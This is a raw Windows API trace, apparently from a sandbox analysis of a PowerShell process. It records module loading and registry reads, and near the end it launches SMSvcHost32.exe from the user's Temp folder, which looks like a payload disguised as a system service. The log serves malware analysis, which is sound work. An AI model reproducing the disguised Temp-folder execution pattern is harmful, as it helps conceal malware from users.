	[0059.017] CoTaskMemFree (pv=0x1505fbd9010) 
	[0059.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0059.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184c18cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0059.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d020) returned 1
	[0059.017] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184c18d100 | out: lpFileInformation=0x184c18d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0059.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cfe0) returned 1
	[0059.017] WldpGetLockdownPolicy () returned 0x0
	[0059.017] GetSystemInfo (in: lpSystemInfo=0x184c18d160 | out: lpSystemInfo=0x184c18d160*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0059.017] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d068 | out: phkResult=0x184c18d068*=0x968) returned 0x0
	[0059.018] RegQueryValueExW (in: hKey=0x968, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d0b8, lpData=0x0, lpcbData=0x184c18d0b0*=0x0 | out: lpType=0x184c18d0b8*=0x0, lpData=0x0, lpcbData=0x184c18d0b0*=0x0) returned 0x2
	[0059.018] RegCloseKey (hKey=0x968) returned 0x0
	[0059.018] CloseHandle (hObject=0x964) returned 1
	[0059.018] CoCreateGuid (in: pguid=0x184c18d218 | out: pguid=0x184c18d218*(Data1=0x6dad2ddb, Data2=0x84, Data3=0x4f0e, Data4=([0]=0x91, [1]=0x45, [2]=0x8c, [3]=0x47, [4]=0xc2, [5]=0xe4, [6]=0x6c, [7]=0xda))) returned 0x0
	[0059.018] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0059.019] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18c830, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0059.021] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18cda0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0059.021] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en-US\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en-us\\microsoft.powershell.management.psd1")) returned 0xffffffff
	[0059.021] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en\\microsoft.powershell.management.psd1")) returned 0xffffffff
	[0059.021] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18bdc0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0059.021] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18bde0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0059.021] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18bd80, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0059.021] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x184c18bd90, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52
	[0059.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c220) returned 1
	[0059.023] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x184c18c300 | out: lpFileInformation=0x184c18c300*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0059.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c1e0) returned 1
	[0059.023] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff
	[0059.023] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll\\microsoft.powershell.commands.management.dll")) returned 0xffffffff
	[0059.023] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9010
	[0059.023] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbd9010, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0059.023] CoTaskMemFree (pv=0x1505fbd9010) 
	[0059.023] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bba0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0059.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bfe0) returned 1
	[0059.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c0c0 | out: lpFileInformation=0x184c18c0c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0059.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bfa0) returned 1
	[0059.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bba0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0059.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bfe0) returned 1
	[0059.026] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c0c0 | out: lpFileInformation=0x184c18c0c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0059.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bfa0) returned 1
	[0059.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0059.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bfe0) returned 1
	[0059.026] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c0c0 | out: lpFileInformation=0x184c18c0c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0059.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bfa0) returned 1
	[0059.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x105, lpBuffer=0x184c18ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x53
	[0059.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18be40) returned 1
	[0059.026] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x184c18bf20 | out: lpFileInformation=0x184c18bf20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0059.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18be00) returned 1
	[0059.027] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff
	[0059.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18be40) returned 1
	[0059.028] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x184c18bf20 | out: lpFileInformation=0x184c18bf20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0059.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18be00) returned 1
	[0059.029] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff
	[0059.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x184c18b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f
	[0059.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x184c18b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f
	[0059.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x184c18b5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f
	[0059.283] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d8f8 | out: phkResult=0x184c18d8f8*=0x964) returned 0x0
	[0059.283] RegQueryValueExW (in: hKey=0x964, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d948, lpData=0x0, lpcbData=0x184c18d940*=0x0 | out: lpType=0x184c18d948*=0x1, lpData=0x0, lpcbData=0x184c18d940*=0x56) returned 0x0
	[0059.284] RegQueryValueExW (in: hKey=0x964, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d948, lpData=0x15047701860, lpcbData=0x184c18d940*=0x56 | out: lpType=0x184c18d948*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d940*=0x56) returned 0x0
	[0059.284] RegCloseKey (hKey=0x964) returned 0x0
	[0059.284] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d8f8 | out: phkResult=0x184c18d8f8*=0x964) returned 0x0
	[0059.284] RegQueryValueExW (in: hKey=0x964, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d948, lpData=0x0, lpcbData=0x184c18d940*=0x0 | out: lpType=0x184c18d948*=0x1, lpData=0x0, lpcbData=0x184c18d940*=0x56) returned 0x0
	[0059.284] RegQueryValueExW (in: hKey=0x964, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d948, lpData=0x15047701c08, lpcbData=0x184c18d940*=0x56 | out: lpType=0x184c18d948*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d940*=0x56) returned 0x0
	[0059.284] RegCloseKey (hKey=0x964) returned 0x0
	[0059.284] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d8f8 | out: phkResult=0x184c18d8f8*=0x964) returned 0x0
	[0059.284] RegQueryValueExW (in: hKey=0x964, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d948, lpData=0x0, lpcbData=0x184c18d940*=0x0 | out: lpType=0x184c18d948*=0x1, lpData=0x0, lpcbData=0x184c18d940*=0x56) returned 0x0
	[0059.284] RegQueryValueExW (in: hKey=0x964, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d948, lpData=0x15047701f88, lpcbData=0x184c18d940*=0x56 | out: lpType=0x184c18d948*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d940*=0x56) returned 0x0
	[0059.284] RegCloseKey (hKey=0x964) returned 0x0
	[0059.284] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d8f8 | out: phkResult=0x184c18d8f8*=0x964) returned 0x0
	[0059.284] RegQueryValueExW (in: hKey=0x964, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d948, lpData=0x0, lpcbData=0x184c18d940*=0x0 | out: lpType=0x184c18d948*=0x1, lpData=0x0, lpcbData=0x184c18d940*=0x56) returned 0x0
	[0059.284] RegQueryValueExW (in: hKey=0x964, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d948, lpData=0x15047702330, lpcbData=0x184c18d940*=0x56 | out: lpType=0x184c18d948*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d940*=0x56) returned 0x0
	[0059.284] RegCloseKey (hKey=0x964) returned 0x0
	[0059.285] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18db50*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18db50*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x68, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.285] SetEvent (hEvent=0x960) returned 1
	[0059.285] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18dd10*=0x960, lpdwindex=0x184c18dae4 | out: lpdwindex=0x184c18dae4) returned 0x0
	[0059.285] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9010
	[0059.285] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbd9010, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0059.285] CoTaskMemFree (pv=0x1505fbd9010) 
	[0059.285] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x184c18e048 | out: lpConsoleScreenBufferInfo=0x184c18e048) returned 1
	[0059.290] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x184c18e048 | out: lpConsoleScreenBufferInfo=0x184c18e048) returned 1
	[0059.303] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18e478*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e478*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.303] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e380*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e380*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x68, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.303] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18e458*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18e458*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.323] CoTaskMemAlloc (cb=0x218) returned 0x1505fbda330
	[0059.323] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbda330, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0059.323] CoTaskMemFree (pv=0x1505fbda330) 
	[0059.326] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")) returned 0x20
	[0059.326] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", nBufferLength=0x105, lpBuffer=0x184c18da50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpFilePart=0x0) returned 0x34
	[0059.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de90) returned 1
	[0059.326] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), fInfoLevelId=0x0, lpFileInformation=0x184c18df70 | out: lpFileInformation=0x184c18df70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542e854e, ftCreationTime.dwHighDateTime=0x1d492ec, ftLastAccessTime.dwLowDateTime=0x542e854e, ftLastAccessTime.dwHighDateTime=0x1d492ec, ftLastWriteTime.dwLowDateTime=0x5431c3db, ftLastWriteTime.dwHighDateTime=0x1d492ec, nFileSizeHigh=0x0, nFileSizeLow=0x3a400)) returned 1
	[0059.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18de50) returned 1
	[0059.327] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", nBufferLength=0x105, lpBuffer=0x184c18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpFilePart=0x0) returned 0x34
	[0059.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de20) returned 1
	[0059.327] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), fInfoLevelId=0x0, lpFileInformation=0x184c18df00 | out: lpFileInformation=0x184c18df00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542e854e, ftCreationTime.dwHighDateTime=0x1d492ec, ftLastAccessTime.dwLowDateTime=0x542e854e, ftLastAccessTime.dwHighDateTime=0x1d492ec, ftLastWriteTime.dwLowDateTime=0x5431c3db, ftLastWriteTime.dwHighDateTime=0x1d492ec, nFileSizeHigh=0x0, nFileSizeLow=0x3a400)) returned 1
	[0059.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dde0) returned 1
	[0059.330] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0059.336] LocalAlloc (uFlags=0x0, uBytes=0x6a) returned 0x1505fba4950
	[0059.337] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1505fc9b220
	[0059.338] ShellExecuteExW (in: pExecInfo=0x15047732408*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpParameters=0x0, lpDirectory="C:\\Users\\Nd9E1FYi\\Desktop", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x15047732408*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpParameters=0x0, lpDirectory="C:\\Users\\Nd9E1FYi\\Desktop", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0xa28)) returned 1
	[0059.787] LocalFree (hMem=0x1505fba4950) returned 0x0
	[0059.787] LocalFree (hMem=0x1505fc9b220) returned 0x0
	[0059.788] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e3c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e3c0*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.790] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e990*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e990*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
